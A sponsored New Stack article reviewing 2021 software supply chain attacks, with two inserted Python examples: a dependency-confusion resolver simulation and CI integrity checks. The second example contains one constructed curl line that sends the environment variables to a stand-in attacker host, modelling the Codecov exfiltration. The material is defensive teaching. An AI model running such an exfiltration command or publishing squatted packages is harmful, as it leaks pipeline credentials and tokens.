URL: https://thenewstack.io/lessons-learned-from-2021-software-supply-chain-attacks/
Lessons Learned from 2021 Software Supply Chain Attacks

The number and impact of last year's attacks highlight the fact that application security teams face a new challenge that will require innovative thinking.
Feb 24th, 2022 6:31am by Eran Orzel
Feature image via Pixabay.
Aqua Security sponsored this post. Insight Partners is an investor in Aqua Security and TNS.

In 2021, the world woke up to a surge in an attack vector that had been a security risk for many years but that the security community could no longer neglect: software supply chain attacks. Following the SolarWinds attack in late 2020, software companies of all sizes, across all industries, faced a growing number of targeted and organized supply chain attacks. The heightened threat resulted in significant system downtime, monetary loss and reputational damage to businesses worldwide.

When Did Random Attacks Become a Pattern?

Eran Orzel
Eran is chief customer and revenue officer and founding member of Argon Security, the leader in software supply chain security acquired by Aqua Security. Prior to joining Argon, he held several roles at Check Point Software Technologies, most recently as the global head of strategic sales and partnerships, where he led and played a significant role in the rapid growth of Check Point’s major business growth engines. Eran is an experienced and innovative business leader with over 20 years of experience in sales leadership and go-to-market operational roles in cybersecurity and enterprise software.

Throughout 2021, supply chain attacks were rapidly increasing in number and sophistication.

This represents a notable shift in attackers’ approach, now focusing their efforts on breaching software suppliers. This allows them to leverage paths that are implicitly trusted, yet less secure, and to establish a way to breach many victims with one attack, by proxy.

The high risk of software supply chains is, in part, attributed to the fact that a successful attack may affect a large number of companies that use the breached supplier’s software.

The SolarWinds attack is a good example of the potential damage of supply chain attacks. In this nation-state attack on the IT management software vendor SolarWinds, a trojanized update of the vendor's own software reached about 18,000 of its customers, every one of which installed it through a channel it trusted.

As many as 250 of these exposed organizations suffered targeted follow-on attacks, including U.S. government agencies such as the Pentagon and top enterprises such as Microsoft and FireEye.

A Turning Point for Software Supply Chain Security

The SolarWinds attack is considered one of the largest and most sophisticated supply chain attacks to date. It drew attackers' attention to how comparatively weak software supply chain security was in most organizations, and it triggered the wave of supply chain attacks that followed. It also received a lot of media coverage and inspired a global wave of security awareness and improvement initiatives focused on reducing the risk of supply chain attacks.

In February that year, Alex Birsan, an information security consultant and bug-bounty hacker, tested how exposed large enterprises were to a supply chain attack technique that abuses the automated dependency resolution built into DevOps pipelines. The tactic, known as dependency confusion, works because package managers such as npm, pip and RubyGems will resolve a bare package name against the public registry as well as any private registry they are configured with. If an organization's internal package name is unclaimed on the public registry, an attacker can publish a malicious package under that name, typically with a higher version number than the internal one, and the build pulls the attacker's code in place of the trusted private library. Birsan achieved code execution inside build and development systems at Apple, Microsoft and dozens of other top companies during this experiment, illustrating that even companies that prioritize security highly can fall victim to implicit shortcomings in the software supply chain.
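The resolution flaw described above, as an added example that is not part of the original article or of Birsan's own proof-of-concept: a small Python simulation of a private and a public package registry. The registry contents, the hypothetical `acme-` internal name prefix and all package names and publishers are constructed for the example. `resolve_naive` behaves like a resolver that merges every configured index and takes the highest version; `resolve_pinned` binds each name prefix to exactly one registry with no fall-through, which is what npm scopes bound to a registry in `.npmrc` or a single private index that the resolver is pinned to achieve in practice. `squattable_internal_names` is the audit step: list the internal names an attacker has already claimed, or could still claim, on the public registry.

```python
"""Dependency confusion, simulated offline (constructed registries, no network).

A naive resolver queries every configured registry for a package name and
installs the highest version it finds anywhere. If an internal package name
is unclaimed on the public registry, an attacker can publish a same-named
package there with an inflated version number and win that comparison.
The hardened resolver binds each name prefix to exactly one registry and
never falls through to another.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Candidate:
    registry: str
    version: tuple   # parsed dotted version, e.g. (1, 2, 0)
    publisher: str


def parse_version(v: str) -> tuple:
    return tuple(int(part) for part in v.split("."))


# Constructed data: "acme-" is a hypothetical company's internal name prefix.
PRIVATE_REGISTRY = {
    "acme-auth-client": {"1.2.0": "acme-build"},
}
PUBLIC_REGISTRY = {
    "left-pad": {"1.3.0": "public-maintainer"},
    # The attacker has claimed the internal name on the public registry.
    "acme-auth-client": {"99.99.99": "attacker"},
}
REGISTRIES = {"private": PRIVATE_REGISTRY, "public": PUBLIC_REGISTRY}


def resolve_naive(name: str) -> Candidate:
    """Vulnerable: merge all registries, highest version wins."""
    candidates = [
        Candidate(reg, parse_version(ver), who)
        for reg, index in REGISTRIES.items()
        for ver, who in index.get(name, {}).items()
    ]
    if not candidates:
        raise KeyError(name)
    return max(candidates, key=lambda c: c.version)


# Hardened policy: first matching prefix decides the registry; "" is the catch-all.
REGISTRY_POLICY = [("acme-", "private"), ("", "public")]


def resolve_pinned(name: str) -> Candidate:
    """Hardened: look the name up only in the registry its prefix is bound to."""
    registry = next(reg for prefix, reg in REGISTRY_POLICY if name.startswith(prefix))
    index = REGISTRIES[registry].get(name)
    if not index:
        raise KeyError(f"{name!r} not found in its designated registry {registry!r}")
    ver, who = max(index.items(), key=lambda kv: parse_version(kv[0]))
    return Candidate(registry, parse_version(ver), who)


def squattable_internal_names(internal_names, public_index=PUBLIC_REGISTRY) -> dict:
    """Audit: for each internal name, report whether it is already claimed on the
    public registry (possible attack in progress) or unclaimed (reserve it now)."""
    return {
        name: ("claimed-publicly" if name in public_index else "unclaimed")
        for name in internal_names
    }


if __name__ == "__main__":
    print("naive :", resolve_naive("acme-auth-client"))
    print("pinned:", resolve_pinned("acme-auth-client"))
    print("audit :", squattable_internal_names(["acme-auth-client", "acme-billing-sdk"]))
```

The important property of `resolve_pinned` is that a missing internal package is an error, not a reason to try the next registry; the fall-through is the whole attack surface. The audit helper is only as good as the list of internal names fed to it, so generate that list from the build manifests rather than from memory.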

Codecov was next, with a similar build-time code-manipulation attack: attackers gained access to Codecov's infrastructure and altered the Bash Uploader script that customers' CI pipelines downloaded and executed on each build. The altered script exfiltrated the pipelines' environment variables, including credentials and tokens, to an attacker-controlled server, so a single change on the supplier's side reached every customer whose pipeline fetched the script.

Not long after, on May 12, 2021, President Biden’s Executive Order on Improving the Nation’s Cybersecurity was released, emphasizing, for the first time, the need to enhance software supply chain security.

In July, the attack on Kaseya raised awareness of the immediate and downstream effects of supply chain attacks. Attackers exploited Kaseya's VSA remote monitoring and management product, which managed service providers use to administer their clients' systems, to push the REvil ransomware to those downstream clients, causing significant downtime and revenue loss.

Image: Visualizing where the biggest attacks compromise the software supply chain

Unfortunately, these examples are not isolated cases, and the number of supply chain attacks has since steadily increased, with the most popular approach being software dependency poisoning. In October and November alone, we saw three attacks against popular npm packages (UA-Parser-JS, COA, and RC), each with millions of downloads per month. In each case attackers took over a maintainer's account and published new versions carrying a cryptominer and credential-stealing malware, which any project that pulled the latest release installed automatically. This tactic has proven quite effective and further stresses the need for the security community to shift their attention to this highly damaging attack vector.
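Both the Codecov incident above and the hijacked npm releases come down to the same gap: a pipeline fetched bytes from a trusted source and used them without checking that they were the bytes it had vetted. The Python below is an added example, not code from the article, from Codecov or from npm. It shows the two checks a CI job can make: verify a downloaded script against a hash recorded at review time before piping it to a shell, and verify each dependency tarball against the `integrity` field of a `package-lock.json` while refusing a version that drifted from the lockfile. The tarball bytes, the script contents, the lockfile and the version numbers are constructed for the example; the lockfile's integrity value is computed from the sample bytes here only so the example runs stand-alone, whereas in a repository it is a stored literal.

```python
"""Pin and verify build inputs before using them (offline, constructed data).

Two checks that share one integrity helper:
  * a script a CI job downloads and pipes to a shell is checksummed against a
    hash recorded when the script was last reviewed (the Codecov uploader case);
  * a dependency tarball is checked against the Subresource Integrity string
    ("sha512-<base64>") recorded in the project's lockfile, and a version that
    drifted from the lockfile is refused (the hijacked-npm-package case).
"""
import base64
import hashlib
import hmac


def sri(data: bytes, algo: str = "sha512") -> str:
    """Produce an SRI string in the form package-lock.json uses."""
    return f"{algo}-{base64.b64encode(hashlib.new(algo, data).digest()).decode()}"


def verify_sri(data: bytes, expected: str) -> bool:
    algo, _, b64 = expected.partition("-")
    if algo not in ("sha256", "sha384", "sha512"):
        return False  # refuse weak or unknown algorithms rather than guess
    try:
        want = base64.b64decode(b64, validate=True)
    except ValueError:
        return False
    return hmac.compare_digest(hashlib.new(algo, data).digest(), want)


def pin_script(script: bytes) -> str:
    """Hash to record (in the repository, out of band) when the script is reviewed."""
    return hashlib.sha256(script).hexdigest()


def verify_script(script: bytes, pinned_sha256_hex: str) -> bool:
    """Gate before `bash <(curl ...)`: run the fetched bytes only if this is True."""
    return hmac.compare_digest(pin_script(script), pinned_sha256_hex)


def check_install(lockfile: dict, fetched: dict) -> list:
    """Compare fetched packages against the lockfile.

    lockfile: the package-lock.json v2/v3 shape,
              {"packages": {"node_modules/<name>": {"version": ..., "integrity": ...}}}
    fetched:  {name: (version, tarball_bytes)} as produced by the resolver
    Returns a list of (name, reason); an empty list means the install may proceed.
    """
    problems = []
    for key, entry in lockfile["packages"].items():
        if not key.startswith("node_modules/"):
            continue  # the "" key is the root project itself
        name = key[len("node_modules/"):]
        if name not in fetched:
            problems.append((name, "missing"))
            continue
        version, tarball = fetched[name]
        if version != entry["version"]:
            problems.append((name, f"version drift {entry['version']} -> {version}"))
        if not verify_sri(tarball, entry["integrity"]):
            problems.append((name, "integrity mismatch"))
    return problems


# Constructed stand-ins: a few bytes play the role of the tarball and the script.
GOOD_TARBALL = b"ua-parser-js 0.7.28 tarball bytes (constructed)"
HIJACKED_TARBALL = GOOD_TARBALL + b" + cryptominer dropper (constructed)"
LOCKFILE = {
    "packages": {
        "": {"name": "example-app", "version": "1.0.0"},
        # In a real lockfile the integrity value is a stored literal, not recomputed.
        "node_modules/ua-parser-js": {"version": "0.7.28", "integrity": sri(GOOD_TARBALL)},
    }
}
UPLOADER_SCRIPT = b"#!/usr/bin/env bash\ncurl -s https://example.invalid/upload -d @coverage.xml\n"
UPLOADER_PIN = pin_script(UPLOADER_SCRIPT)  # recorded at review time, not at fetch time
ALTERED_UPLOADER = UPLOADER_SCRIPT + b"curl -s http://attacker.invalid -d \"$(env)\"\n"


def demo() -> dict:
    return {
        "clean_install": check_install(LOCKFILE, {"ua-parser-js": ("0.7.28", GOOD_TARBALL)}),
        "hijacked_install": check_install(LOCKFILE, {"ua-parser-js": ("0.7.29", HIJACKED_TARBALL)}),
        "uploader_ok": verify_script(UPLOADER_SCRIPT, UPLOADER_PIN),
        "uploader_altered_ok": verify_script(ALTERED_UPLOADER, UPLOADER_PIN),
    }


if __name__ == "__main__":
    for check, result in demo().items():
        print(f"{check}: {result}")
```

A pin only helps if it is stored somewhere the attacker who altered the artifact cannot also alter, so it belongs in the consuming repository, not on the server the script is fetched from. For npm specifically, `npm ci` already refuses to run when `package.json` and the lockfile disagree; the version-drift check here is the manual equivalent for pipelines that still run plain `npm install` against floating version ranges.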

The past year's final major incident came on December 9, when the Log4Shell vulnerability in the ubiquitous Log4j logging library was disclosed and forced software vendors into a patching frenzy. Within hours of the disclosure, attackers began scanning for and exploiting the flaw. Log4Shell was a vulnerability in a widely embedded open-source dependency rather than a deliberate compromise of one, but it spread through the same dependency chains and left most organizations struggling even to find where Log4j was embedded in their software.

Aqua Security is the largest pure-play cloud native security company, providing the freedom to innovate and accelerate digital transformations. Aqua enables customers to capture the benefits of cloud native without sacrificing the security of their supply chains and production environments. Aqua Security and TNS are under common control.

Main Lessons Learned from Analyzing the 2021 Attacks

Examining the success rate and consequent damage of the many attacks in 2021, one of the most evident details is that current security tools and practices are not adequate for preventing supply chain attacks. Traditional application security testing, static and dynamic analysis of the application's own code, cannot detect supply chain attacks: these deliver deliberately malicious code through trusted artifacts (a dependency, a build tool, a vendor update) rather than through the coding vulnerabilities such tools are designed to find.

Additionally, established CI/CD and DevOps pipelines rely on implicitly trusted credentials and broad permissions to enable rapid commits and deployment, and they apply security controls at the end of the process, far too late to preclude malicious activity that has already run inside the pipeline.

For organizations to stay secure, there is an increasing need for new protective methods and solutions that are built to address the unique characteristics of supply chain attacks.

Supply Chain Attack Vectors Still Waiting for a Solution

The number and impact of the past year’s attacks highlight the fact that application security teams face a new challenge that will require innovative thinking. Most AppSec teams lack the resources, budget and knowledge to sufficiently address the risk of supply chain attacks. This is further complicated by the need for cooperation from development and DevOps teams.

For more insights into software supply chain security trends, explore the full 2021 Software Supply Chain Security Report.

TNS owner Insight Partners is an investor in: Aqua Security, Pragma, Kaseya, SolarWinds.